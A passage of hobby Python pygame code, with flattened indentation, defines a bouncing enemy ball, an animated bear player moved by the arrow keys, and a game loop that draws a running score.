"""this is the enemy ball thing"""
def __init__(self):
super(Ball, self).__init__()
self.img = pygame.image.load("gfx/ball.png").convert_alpha()
self.rect = self.img.get_rect()
self.rect.x = 10
self.rect.y = 10
self.vel_x = 3
self.vel_y = 3
self.score = 0
def update(self, screen_rect):
"""updates ball's position"""
future_rect = self.rect.move(self.vel_x, self.vel_y)
if future_rect.left < screen_rect.left or future_rect.right > screen_rect.right:
self.vel_x = -self.vel_x
self.score += 1
if future_rect.top < screen_rect.top or future_rect.bottom > screen_rect.bottom:
self.vel_y = -self.vel_y
self.score += 1
self.rect.move_ip(self.vel_x, self.vel_y)
def draw(self, screen):
"""draws ball to screen"""
screen.blit(self.img, self.rect)
class Player(object):
"""cute fat little bear"""
def __init__(self):
self.image = pygame.image.load("gfx/bear.png").convert_alpha()
self.rect = self.image.get_rect()
self.rect.width = 64
self.rect.height = 143
self.rect.x = 25
self.rect.y = 25
self.xvel = 6
self.yvel = 6
self.direction = 0 #0 == right, 1 == left
self.moving = [False, False, False, False] #up, down, left, right
self.frame = 0
def update(self, score):
"""updates position of the bear"""
if self.moving[0] and self.moving[1]:
return score
elif self.moving[2] and self.moving[3]:
return score
if self.moving[0]:
future = self.rect.move(0, -self.yvel)
if future.top < 0:
self.rect.top = 0
score += 1
else:
self.rect = future
elif self.moving[1]:
future = self.rect.move(0, self.yvel)
if future.bottom > 448:
self.rect.bottom = 448
score += 1
else:
self.rect = future
if self.moving[2]:
self.direction = 1
future = self.rect.move(-self.xvel, 0)
if future.left < 0:
self.rect.left = 0
score += 1
else:
self.rect = future
elif self.moving[3]:
self.direction = 0
future = self.rect.move(self.xvel, 0)
if future.right > 640:
self.rect.right = 640
score += 1
else:
self.rect = future
if self.moving == [False, False, False, False]:
self.frame = 0
else:
self.frame += 1
if self.frame > 19:
self.frame = 0
return score
def draw(self, screen):
"""draws the bear"""
screen.blit(self.image, self.rect, pygame.Rect(64*(self.frame/5),self.direction*143,64, 143))
class Game(object):
def __init__(self):
"""initializes the game"""
pygame.init()
self.screen = pygame.display.set_mode((640, 448))
self.clock = pygame.time.Clock()
self.map = Map()
self.player = Player()
self.ball = Ball()
self.f32 = pygame.font.Font(None, 32)
self.score = 0
def process_events(self):
for event in pygame.event.get():
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
sys.exit()
if event.key == pygame.K_UP:
self.player.moving[0] = True
if event.key == pygame.K_DOWN:
self.player.moving[1] = True
if event.key == pygame.K_LEFT:
self.player.moving[2] = True
if event.key == pygame.K_RIGHT:
self.player.moving[3] = True
if event.type == pygame.KEYUP:
if event.key == pygame.K_UP:
self.player.moving[0] = False
if event.key == pygame.K_DOWN:
self.player.moving[1] = False
if event.key == pygame.K_LEFT:
self.player.moving[2] = False
if event.key == pygame.K_RIGHT:
self.player.moving[3] = False
def update(self):
self.score = self.player.update(self.score)
self.ball.update(self.screen.get_rect())
def draw(self):
self.map.draw(self.screen)
self.ball.draw(self.screen)
self.player.draw(self.screen)
scoresurf = self.f32.render("Score = %d"%self.score, 1, (0,0,0))
scorerect = scoresurf.get_rect()
scorerect.center = (320, 30)
self.screen.blit(scoresurf, scorerect)
g = Game()
while True:
g.clock.tick(30)
g.process_events()
g.update()
g.draw()
pygame.display.flip() | true |